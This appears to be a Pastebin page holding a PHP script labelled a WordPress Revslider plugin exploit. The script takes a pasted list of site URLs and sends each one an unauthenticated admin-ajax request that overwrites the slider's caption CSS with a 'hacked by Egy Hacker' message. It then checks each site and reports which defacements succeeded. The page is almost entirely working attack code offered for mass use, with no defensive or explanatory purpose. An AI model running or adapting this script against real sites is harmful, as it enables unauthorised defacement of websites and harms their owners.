Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <b>..::|| Wordpress Revslider Plugin Exploit ||::..</b>
- <?php
- /*
- [#]Coded By : ElMaGiCo
- [#]http://magico-sec.blogspot.com
- [#]http://www.facebook.com/ElKiller.2013
- */
- //======================================================
- @error_reporting(0);
- @set_time_limit(0);
- //======================================================
- echo'<form method="post">
- <textarea name="s" cols="50" rows="13" ></textarea><br>
- <input type="submit" name="g" value="GO" />
- </form>';
- //=======================================================
- if(isset($_POST['g']) and !empty($_POST['s'])){
- $urls = explode("\r\n",$_POST['s']);
- foreach($urls as $url){
- $url = trim($url);
- $post = array("action" => "revslider_ajax_action",
- "client_action" => "update_captions_css",
- "data" => "<h2>hacked <br>by Egy Hacker <br>:)<br>");
- $site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL, $site);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch,CURLOPT_POST,true);
- curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
- curl_setopt($ch,CURLOPT_TIMEOUT,30);
- curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
- $cn = curl_exec($ch);
- $fcn = @file_get_contents($site);
- if(eregi('hacked',$fcn)){
- echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>";
- }else{
- echo"[!]$url : failed<br>";
- }
- }
- }
- //========================= \!/ FiNiSH \!/ ====================================================//
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
